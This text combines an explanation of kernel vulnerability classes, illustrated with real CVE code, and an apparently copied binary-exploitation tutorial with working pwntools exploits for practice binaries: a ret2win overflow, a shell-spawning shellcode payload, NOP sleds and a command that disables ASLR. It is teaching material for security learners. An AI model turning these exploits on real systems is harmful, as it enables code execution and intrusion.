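Next, unvalidated pointers. These typically arise where user space and kernel space share one virtual address space. Kernel space sits above user space, and its page tables are replicated in the page tables of every process. Some virtual address is chosen as a limit: addresses above (or below) it belong to the kernel and the rest belong to user space. Kernel functions use this limit to decide whether a pointer refers to kernel or user space. In the former case only light validation may be needed, but in the latter great care is required, otherwise a user-space address may be dereferenced in an uncontrolled way.

A Linux example, CVE-2008-0009: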

    error = get_user(base, &iov->iov_base);     // [1]
    [...]
    if (unlikely(!base)) {
        error = -EFAULT;
        break;
    }
    [...]
    sd.u.userptr = base;                        // [2]
    [...]
    size = __splice_from_pipe(pipe, &sd, pipe_to_user);
[...]
static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf, struct splice_desc *sd)
{
    if (!fault_in_pages_writeable(sd->u.userptr, sd->len)) {
        src = buf->ops->map(pipe, buf, 1);
        ret = __copy_to_user_inatomic(sd->u.userptr, src + buf->offset, sd->len);                               // [3]
        buf->ops->unmap(pipe, buf, src);
[...]
}

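The first part of the code comes from vmsplice_to_user(), which uses get_user() at [1] to fetch the destination pointer. The pointer is assumed to be a user-space address without any check and is passed via [2] to __splice_from_pipe(), together with pipe_to_user as the helper function. That function, again without any check, calls __copy_to_user_inatomic() at [3], which dereferences the pointer. If the attacker supplies a kernel address, the bug allows arbitrary data to be written to arbitrary kernel memory. Note also that Linux functions whose names begin with two underscores (such as __copy_to_user_inatomic()) perform no checks on the destination (or source) user pointer they are given.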
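The missing validation amounts to a range check against the user/kernel boundary. The sketch below illustrates the idea only: USER_LIMIT (a classic 32-bit 3 GiB / 1 GiB split) and range_is_user are assumptions made for this example, not the kernel's actual definitions.

```python
USER_LIMIT = 0xC0000000  # assumed boundary between user and kernel addresses


def range_is_user(addr, size, limit=USER_LIMIT):
    """Return True only if [addr, addr + size) lies entirely below the limit."""
    # Written as a subtraction so that addr + size cannot wrap around.
    return size <= limit and addr <= limit - size


print(range_is_user(0x08048000, 0x1000))   # ordinary user buffer
print(range_is_user(0xC0100000, 4))        # kernel address supplied by a user
print(range_is_user(0xBFFFFFFF, 2))        # straddles the boundary
```

A copy routine that skips this kind of check trusts the caller to have done it already, which is exactly what went wrong between [1] and [3].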

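Finally, a corrupted pointer is usually the result of another bug (such as a buffer overflow); the attacker can change the pointer's contents at will and gain further control.

Memory Corruption Vulnerabilities

These bugs arise when a programming error overwrites kernel-space memory, including the kernel stack and the kernel heap.

The kernel stack comes into play each time a process enters kernel mode. It is largely the same as the user stack, with some small differences; for example, its size is usually limited. In addition, the kernel stacks of all processes are part of the same kernel address space, so they start at different virtual addresses and occupy different ranges of virtual addresses.

Because the kernel stack resembles the user stack, bugs occur in much the same places: use of unsafe functions (strcpy(), sprintf() and so on), out-of-bounds array accesses, buffer overflows, and the like.

Bugs in the kernel heap are usually caused by buffer overflows. Overwriting the chunk that follows the overflowed one, or overwriting cache-related metadata, can both make exploitation possible.

Integer Issues

Integer overflows and sign conversion errors are the two most common kinds of integer misuse. These bugs are often hard to exploit on their own, but they can lead to other bugs such as memory overflows.

An integer overflow occurs when a value outside the range an integer type can store is assigned to a variable of that type. It can also occur in unchecked additions and multiplications when the operands are not validated.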
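As a small illustration of the multiplication case, the sketch below emulates 32-bit unsigned arithmetic in Python by masking the result. The scenario (an element count multiplied by an element size to compute an allocation size) and the function name are assumptions chosen for the example.

```python
MASK32 = 0xFFFFFFFF


def alloc_size_32(count, elem_size):
    """Size a 32-bit unsigned multiplication would produce (wraps modulo 2**32)."""
    return (count * elem_size) & MASK32


count = 0x40000001           # attacker-chosen element count
elem_size = 4

true_size = count * elem_size
wrapped = alloc_size_32(count, elem_size)
print(hex(true_size), hex(wrapped))
```

The code would allocate only the wrapped size but then copy count elements into it, which is how an integer overflow turns into a memory overflow.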

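A sign conversion error occurs when an unsigned number is treated as a signed one, or the reverse. A classic case: a signed number passes a maximum-value check and is then handed to a function that only accepts unsigned numbers.

An example from FreeBSD 6.0: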

int fw_ioctl (struct cdev *dev, u_long cmd, caddr_t data, int flag, fw_proc *td)
{
[...]
    int s, i, len, err = 0;                                     // [1]
    [...]
    struct fw_crom_buf *crom_buf = (struct fw_crom_buf *)data;  // [2]
    [...]
    if (fwdev == NULL) {
    [...]
        len = CROMSIZE;
    [...]
    } else {
    [...]
        if (fwdev->rommax < CSRROMOFF)
            len = 0;
        else
            len = fwdev->rommax - CSRROMOFF + 4;
    }
    if (crom_buf->len < len)                                    // [3]
        len = crom_buf->len;
    else
        crom_buf->len = len;
    err = copyout(ptr, crom_buf->ptr, len);                     // [4]
}

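len at [1] is a signed integer. crom_buf->len is also signed and is under our control; if it is set to a negative number, the condition at [3] holds regardless of the value of len. Then copyout() is called at [4]. Its prototype is: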

int copyout(const void *__restrict kaddr, void *__restrict udaddr, size_t len) __nonnull(1) __nonnull(2);

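The third parameter has type size_t, which is unsigned, so a negative len is interpreted as a very large positive integer, resulting in an arbitrary kernel memory read.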
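The effect of the conversion can be reproduced in Python. This sketch assumes a 64-bit size_t; clamp_len mirrors the comparison at [3] and as_size_t reinterprets the signed result as copyout() would see it. Both helper names are made up for the example.

```python
import struct


def clamp_len(user_len, kernel_len):
    """Signed comparison as at [3]: keep the smaller of the two lengths."""
    return user_len if user_len < kernel_len else kernel_len


def as_size_t(value):
    """Reinterpret a signed 64-bit value as an unsigned 64-bit size_t."""
    return struct.unpack("<Q", struct.pack("<q", value))[0]


length = clamp_len(-1, 1024)      # attacker supplies crom_buf->len = -1
print(length, hex(as_size_t(length)))
```

The signed check happily picks the negative value as the "smaller" length, and the unsigned parameter then turns it into the largest possible copy size.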

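For more, see section 3.1.2.

Race Conditions

A race condition exists when two or more actors are about to perform some action and the outcome differs depending on the order in which they run. There are many ways to avoid race conditions, such as locks, semaphores, and condition variables, which keep the actors synchronized. The most important aspect of a race condition is the size of the race window, which determines how easy the race is to trigger. For this reason, some race conditions can only be exploited on symmetric multiprocessing (SMP) systems.

Logic Bugs

Logic bugs come in many varieties; here we look at a reference counter overflow. A shared resource has a reference count and is released when the count reaches zero, so that memory is not wasted. Operating systems usually provide functions such as get and put/drop to increment and decrement the count explicitly.

An example from FreeBSD 5.0: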

int fpathconf(td, uap)
    struct thread *td;
    register struct fpathconf_args *uap;
{
    struct file *fp;
    struct vnode *vp;
    int error;
    if ((error = fget(td, uap->fd, &fp)) != 0)      // [1]
        return (error);
[...]
    switch (fp->f_type) {
    case DTYPE_PIPE:
    case DTYPE_SOCKET:
        if (uap->name != _PC_PIPE_BUF)
            return (EINVAL);                        // [2]
        p->p_retval[0] = PIPE_BUF;
        error = 0;
        break;
[...]
out:
    fdrop(fp, td);                                  // [3]
    return (error);
}

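The fpathconf() system call retrieves information about a particular open file descriptor. At [1], near the start of the call, fget() takes a reference to the file descriptor structure, and at [3], on exit, fdrop() releases it. However, the code at [2] returns directly without releasing the reference. If fpathconf() is called repeatedly so that the return at [2] is hit each time, the reference counter may eventually overflow.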
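The wrap-around can be modelled with modular arithmetic. The sketch below assumes a 32-bit unsigned counter, which the excerpt above does not state; the width and the function name are illustrative only.

```python
COUNTER_BITS = 32                      # assumed width of the reference counter
MASK = (1 << COUNTER_BITS) - 1


def count_after_leaks(start, leaks):
    """Counter value after `leaks` calls that take a reference and never drop it."""
    return (start + leaks) & MASK


start = 1                              # one legitimate holder of the file
leaks = (1 << COUNTER_BITS) - start    # leaked references needed to wrap to zero
wrapped = count_after_leaks(start, leaks)
print(leaks, wrapped)
```

Once the counter has wrapped, a single well-behaved get/drop pair brings it from 0 to 1 and back to 0, so the object is released while the original holder still uses it.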

Binary Exploitation - Stack

https://ir0nstone.gitbook.io/notes/

Introduction

An Introduction to binary exploitation

Binary Exploitation is about finding vulnerabilities in programs and utilizing them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.

When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.

introduction.zip

Analysis

The archive contains two files - source.c and vuln; the latter is an ELF file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).

We're gonna use a tool called radare2 to analyze the behavior of the binary when functions are called.

$ r2 -d -A vuln

The -d runs it while the -A performs the analysis. We can disassemble the main with

s main; pdf

s main seeks (moves) to main, while pdf stands for Print Disassembly Function (literally just disassembles it).

0x080491ab      55             push ebp
0x080491ac      89e5           mov ebp, esp
0x080491ae      83e4f0         and esp, 0xfffffff0
0x080491b1      e80d000000     call sym.__x86.get_pc_thunk.ax
0x080491b6      054a2e0000     add eax, 0x2e4a
0x080491bb      e8b2ffffff     call sym.unsafe
0x080491c0      90             nop
0x080491c1      c9             leave
0x080491c2      c3             ret

The call to unsafe is at 0x080491bb, so let's break there.

db 0x080491bb

db stands for debug breakpoint and just sets a breakpoint. A breakpoint is simply somewhere that pauses the program for you to run other commands when reached. Now we run dc for debug continue; this just carries on running the file.

It should break before unsafe is called; let's analyze the top of the stack now:

[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000         [...]

The first address, 0xff984af0, is the position; the 0xf7efe000 is the value. Let's move one more instruction with the ds, debug step, and check the stack again.

[0x08049172]> pxw @ esp
0xff984aec  0x080491c0 0xf7efe000

Huh, something's been pushed onto the stack - the value 0x080491c0. This looks like it's in the binary - but where?

[...]
0x080491b6      054a2e0000     add eax, 0x2e4a
0x080491bb      e8b2ffffff     call sym.unsafe
0x080491c0      90             nop
[...]

Look at that - it's the instruction after the call to unsafe. Why? This is how the program knows where to return to after unsafe() has finished.
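The pushed value can be derived from the disassembly itself: a call pushes the address of the instruction that follows it, and the e8 opcode carries a signed 32-bit offset relative to that same address. A quick check in Python, using only the bytes shown in the listing:

```python
import struct

call_addr = 0x080491bb
insn = bytes.fromhex("e8b2ffffff")    # call sym.unsafe, as shown by pdf

# The return address is simply the address of the next instruction.
return_addr = call_addr + len(insn)

# The four bytes after the e8 opcode are a little-endian signed displacement.
rel32 = struct.unpack("<i", insn[1:])[0]
target = return_addr + rel32

print(hex(return_addr), rel32, hex(target))
```

return_addr comes out as 0x080491c0, the value we saw appear on the stack, and target is where unsafe starts.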

Weaknesses

But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe and break on the ret instruction; ret is the equivalent of pop eip, which will get the saved return pointer we just analyzed on the stack into the eip register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.

[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec.

[0x080491aa]> pxw @ 0xff984aec
0xff984aec  0x41414141 0x41414141 0x41414141 0x41414141  AAAAAAAAAAAAAAAA

Huh?

It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret, the value popped into eip won't be in the previous function but rather 0x41414141. Let's check with ds.

[0x080491aa]> ds
[0x41414141]>

And look at the new prompt - 0x41414141. Let's run dr eip to make sure that's the value in eip:

[0x41414141]> dr eip
0x41414141

Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc.

[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0

radare2 is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault, which could mean a variety of things, but usually that you have overwritten EIP.

Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.

Summary

When a function calls another function, it

pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again

Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets() can prevent such easy overflow, but you should check how much is actually being read.

ret2win

The most basic binexp challenge

A ret2win is simply a binary where there is a win() function (or equivalent); once you successfully redirect execution there, you complete the challenge.

To carry this out, we have to leverage what we learned in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.

To do this, what do we need to know? Well, a couple of things:

The padding until we begin to overwrite the return pointer (EIP)
What value do we want to overwrite EIP to

When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.

ret2win.zip

Finding the Padding

This can be found using simple trial and error; if we send a variable number of characters, we can use the Segmentation Fault message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.

You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.

We get an offset of 52 bytes.

Finding the Address

Now we need to find the address of the flag() function in the binary. This is simple.

$ r2 -d -A vuln
$ afl
[...]
0x080491c3    1 43           sym.flag
[...]

afl stands for Analyse Functions List

The flag() function is at 0x080491c3.

Using the Information

The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the As that we sent became 0x41 - which is the ASCII code of A. So the solution is simple - let's just find the characters with byte values 0x08, 0x04, 0x91, and 0xc3.

This is a lot simpler than you might think because we can specify them in Python as hex:

address = '\x08\x04\x91\xc3'

And that makes it much easier.

Putting it Together

Now we know the padding and the value, let's exploit the binary! We can use pwntools to interface with the binary (check out the pwntools posts for a more in-depth look).

from pwn import *        # This is how we import pwntools

p = process('./vuln')    # We're starting a new process

payload = 'A' * 52
payload += '\x08\x04\x91\xc3'

p.clean()                # Receive all the text

p.sendline(payload)

log.info(p.clean())      # Output the "Exploited!" string to know we succeeded

If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put a pause() to give us time to attach radare2 to the process.

from pwn import *

p = process('./vuln')

payload = 'A' * 52
payload += '\x08\x04\x91\xc3'

log.info(p.clean())

pause()        # add this in

p.sendline(payload)

log.info(p.clean())

Now let's run the script with python3 exploit.py and then open up a new terminal window.

r2 -d -A $(pidof vuln)

By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe() and read the value of the return pointer.

[0x08049172]> db 0x080491aa
[0x08049172]> dc

<< press any button on the exploit terminal window >>

hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c  0xc3910408 [...]
[...]

0xc3910408 - look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the one holding the highest-order digits of the number) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the bytes are stored in reverse order in little-endian executables.
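The two byte orders can be compared directly with Python's standard struct module. This is just a demonstration of the byte layouts, separate from the exploit script:

```python
import struct

addr = 0x080491c3

big = struct.pack(">I", addr)       # most significant byte first
little = struct.pack("<I", addr)    # least significant byte first

# What a little-endian CPU reads back if we send the big-endian bytes.
misread = struct.unpack("<I", big)[0]

print(big, little, hex(misread))
```

misread is 0xc3910408, exactly the value radare2 showed on the stack, while the bytes in little are what the binary needs to receive.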

Finding the Endianness

radare2 comes with a nice tool called rabin2 for binary analysis:

$ rabin2 -I vuln
[...]
endian   little
[...]

So our binary is little-endian.

Accounting for Endianness

The fix is simple - reverse the address (you can also remove the pause())

payload += '\x08\x04\x91\xc3'[::-1]

If you run this now, it will work:

$ python3 tutorial.py 
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!

And wham, you've called the flag() function! Congrats!

Pwntools and Endianness

Unsurprisingly, you're not the first person to have thought "Could they possibly make endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!

payload += '\x08\x04\x91\xc3'[::-1]

becomes

payload += p32(0x080491c3)

Much simpler, right?

The only caveat is that it returns bytes rather than a string, so you have to make the padding a byte string:

payload = b'A' * 52        # Notice the "b"

Otherwise, you will get a

TypeError: can only concatenate str (not "bytes") to str
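As a rough stand-in for what p32() does with pwntools' default little-endian settings, the sketch below uses only the standard library. pack32 and build_payload are our own illustrative names, not pwntools functions. It shows the working bytes padding next to the failing str padding.

```python
def pack32(value):
    """Stand-in for p32(): 4 bytes, least significant byte first."""
    return value.to_bytes(4, 'little')

def build_payload(padding):
    return padding + pack32(0x080491c3)

payload = build_payload(b'A' * 52)       # bytes + bytes works

try:
    build_payload('A' * 52)              # str + bytes does not
    mixing_failed = False
except TypeError:
    mixing_failed = True
```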

Final Exploit

from pwn import *            # This is how we import pwntools

p = process('./vuln')        # We're starting a new process

payload = b'A' * 52
payload += p32(0x080491c3)   # Use pwntools to pack it

log.info(p.clean())          # Receive all the text
p.sendline(payload)

log.info(p.clean())          # Output the "Exploited!" string to know we succeeded

De Bruijn Sequences

The better way to calculate offsets

A De Bruijn sequence of order n is simply a sequence in which no string of n consecutive characters is repeated. This makes finding the offset to EIP much simpler - we can just pass in a De Bruijn sequence, read the value that ends up in EIP, and find its one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.

Generating the Pattern

Again, radare2 comes with a nice command-line tool (called ragg2) that can generate it for us. Let's create a sequence of length 100.

$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.

Using the Pattern

Now we have the pattern, let's just input it in radare2 when prompted for input, make it crash, and then calculate how far along the sequence the EIP is. Simples.

$ r2 -d -A vuln

[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0

The address it crashes on is 0x41534141; we can use radare2's in-built wopO command to work out the offset.

[0x41534141]> wopO 0x41534141
52

Awesome - we get the correct value!

We can also be lazy and not copy the value.

[0x41534141]> wopO `dr eip`
52

The backticks mean the dr eip is calculated first before the wopO is run on the result of it.
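If you are curious what happens under the hood, the sketch below generates a De Bruijn sequence with the standard recursive algorithm and recovers an offset from a simulated crash value. It is an illustration only: the alphabet and helper name are our own choices, the output will not match ragg2's pattern, and the "crash" is faked by reading 4 bytes at offset 52.

```python
def de_bruijn(alphabet, n):
    """Return a De Bruijn sequence of order n over the given alphabet."""
    k = len(alphabet)
    a = [0] * (k * n)
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return ''.join(alphabet[i] for i in sequence)

pattern = de_bruijn('ABCDEFGH', 4)[:100]

# Pretend the saved return pointer sits 52 bytes into our input
crash_value = int.from_bytes(pattern[52:56].encode(), 'little')

# Recover the offset from the crash value alone
offset = pattern.index(crash_value.to_bytes(4, 'little').decode())
```

Because every 4-character window is unique, the lookup can only ever match in one place.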

Shellcode

Running your own code

In real exploits, it's not particularly likely that you will have a win() function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.

Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!

I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.

The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.

shellcode.zip

Disabling ASLR

ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomizing certain aspects of memory (we will talk about it in much more detail later). This randomization can make shellcode exploits like the one we're about to do less reliable, so we'll be disabling it, for now, using this.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Again, you should never run commands if you don't know what they do

Finding the Buffer in Memory

Let's debug vuln using radare2 and work out where in memory the buffer in unsafe() starts; this is where we want to point the return pointer to.

$ r2 -d -A vuln

[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]

This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets() and find the exact address.

[0x08049172]> dc
Overflow me
<<Found me>>                    <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xffffcfb4  3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7  <<Found me>>....

[...]

It appears to be at 0xffffcfb4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).

Finding the Padding

Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.

$ ragg2 -P 400 -r
<copy this>

$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312

The padding is 312 bytes.

Putting it all together

In order for the shellcode to be correct, we're going to set the context.binary to our binary; this grabs stuff like the arch, OS, and bits and enables pwntools to provide us with working shellcode.

from pwn import *

context.binary = ELF('./vuln')

p = process()

We can use just process() because once the context.binary is set it is assumed to use that process

Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.

payload = asm(shellcraft.sh())          # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4)              # Address of the Shellcode

Yup, that's it. Now let's send it off and use p.interactive(), which enables us to communicate with the shell.

log.info(p.clean())

p.sendline(payload)

p.interactive()

If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong

$ python3 exploit.py
[*] 'vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py  source.c  vuln

And it works! Awesome.

Final Exploit

from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = asm(shellcraft.sh())          # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4)              # Address of the Shellcode

log.info(p.clean())

p.sendline(payload)

p.interactive()

Summary

We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution
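The layout of the payload can be checked without pwntools. The sketch below is only an illustration: the shellcode is replaced by placeholder bytes (it is not real shellcode), and the constant names are ours. The address and offset are the ones found earlier.

```python
BUFFER_ADDRESS = 0xffffcfb4   # where our input starts (from the radare2 session)
OFFSET = 312                  # bytes before the saved return pointer

# Placeholder bytes only - NOT real shellcode; stands in for asm(shellcraft.sh())
shellcode = b'\xcc' * 24

payload = shellcode.ljust(OFFSET, b'A') + BUFFER_ADDRESS.to_bytes(4, 'little')

# The 4 bytes that land on the saved return pointer
saved_return = int.from_bytes(payload[OFFSET:OFFSET + 4], 'little')
```

The saved return pointer ends up holding the address of the first byte of the payload, which is where the shellcode sits.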

NOPs

More reliable shellcode exploits

NOP (no operation) instructions do exactly what they sound like: nothing. This makes them very useful for shellcode exploits because all they do is move on to the next instruction. If we pad our exploit on the left with NOPs and point EIP into the middle of them, it'll simply keep executing NOPs until it reaches our actual shellcode. This gives us a greater margin of error, as a shift of a few bytes forward or backward won't really affect it; it'll just run a different number of NOP instructions, with the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled since EIP is essentially sliding down them.

In Intel x86 assembly, NOP instructions are \x90.

The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing. You can read a bit more about it on this StackOverflow question.

Updating our Shellcode Exploit

We can make slight changes to our exploit to do two things:

Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start

Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.

from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = b'\x90' * 240                 # The NOPs
payload += asm(shellcraft.sh())         # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4 + 120)        # Address of the buffer + half nop length

log.info(p.clean())

p.sendline(payload)

p.interactive()

It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack

Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:

nop = asm(shellcraft.nop())
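To convince yourself that the exact landing spot does not matter, here is a toy model of the sled. It is a sketch, not an emulator: the shellcode is placeholder bytes, and landing_index is a helper we made up that just skips over \x90 bytes.

```python
NOP = 0x90
SLED_LENGTH = 240

shellcode = b'\xcc' * 24      # placeholder bytes, not real shellcode
buffer = bytes([NOP]) * SLED_LENGTH + shellcode

def landing_index(start):
    """Follow NOPs from 'start' and return the index where the sliding stops."""
    index = start
    while buffer[index] == NOP:
        index += 1
    return index

# Try every possible landing spot inside the sled
landings = {landing_index(start) for start in range(SLED_LENGTH)}
```

Every starting point inside the sled ends at index 240, the first byte of the shellcode.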

32- vs 64-bit

The differences between the sizes

Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switching out the p32() for p64() as the memory addresses are longer.
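The difference in packing is easy to see with the standard library. This is a sketch of what p32() and p64() produce with pwntools' default little-endian settings, not the pwntools code itself.

```python
address = 0x080491c3

packed_32 = address.to_bytes(4, 'little')   # 4 bytes, like p32()
packed_64 = address.to_bytes(8, 'little')   # 8 bytes, like p64()
```

The 64-bit version is the same 4 bytes followed by 4 null bytes, which is worth remembering when your input is read by a function that stops at null bytes.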

The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8, and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.

Binary Exploitation - Stack

https://ir0nstone.gitbook.io/notes/

No eXecute

The defense against shellcode

As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralizing the shellcode.

To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.

The Windows version of NX is DEP, which stands for Data Execution Prevention

Checking for NX

You can either use pwntools' checksec or rabin2.

$ checksec vuln
[*] 'vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

$ rabin2 -I vuln
[...]
nx       false
[...]

Return-Oriented Programming

Bypassing NX

The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way as to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command string, such as cat flag.txt, and pass it as a parameter to system, it will execute that command and show us the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell, much like the shellcode we used did.

Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.

Calling Conventions

A more in-depth look into parameters for 32-bit and 64-bit programs

One Parameter

calling-conventions-one-param

Source

Let's have a quick look at the source:

#include <stdio.h>

void vuln(int check) {
    if(check == 0xdeadbeef) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef);
    vuln(0xdeadc0de);
}

Pretty simple.

If we run the 32-bit and 64-bit versions, we get the same output:

Nice!
Not nice!

Just what we expected.

Analyzing 32-bit

Let's open the binary up in radare2 and disassemble it.

$ r2 -d -A vuln-32
$ s main; pdf

0x080491ac      8d4c2404       lea ecx, [argv]
0x080491b0      83e4f0         and esp, 0xfffffff0
0x080491b3      ff71fc         push dword [ecx - 4]
0x080491b6      55             push ebp
0x080491b7      89e5           mov ebp, esp
0x080491b9      51             push ecx
0x080491ba      83ec04         sub esp, 4
0x080491bd      e832000000     call sym.__x86.get_pc_thunk.ax
0x080491c2      053e2e0000     add eax, 0x2e3e
0x080491c7      83ec0c         sub esp, 0xc
0x080491ca      68efbeadde     push 0xdeadbeef
0x080491cf      e88effffff     call sym.vuln
0x080491d4      83c410         add esp, 0x10
0x080491d7      83ec0c         sub esp, 0xc
0x080491da      68dec0adde     push 0xdeadc0de
0x080491df      e87effffff     call sym.vuln
0x080491e4      83c410         add esp, 0x10
0x080491e7      b800000000     mov eax, 0
0x080491ec      8b4dfc         mov ecx, dword [var_4h]
0x080491ef      c9             leave
0x080491f0      8d61fc         lea esp, [ecx - 4]
0x080491f3      c3             ret

If we look closely at the calls to sym.vuln, we see a pattern:

push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln

We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.

[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c      0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c

The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.

┌ 74: sym.vuln (int32_t arg_8h);
│           ; var int32_t var_4h @ ebp-0x4
│           ; arg int32_t arg_8h @ ebp+0x8
│           0x08049162 b    55             push ebp
│           0x08049163      89e5           mov ebp, esp
│           0x08049165      53             push ebx
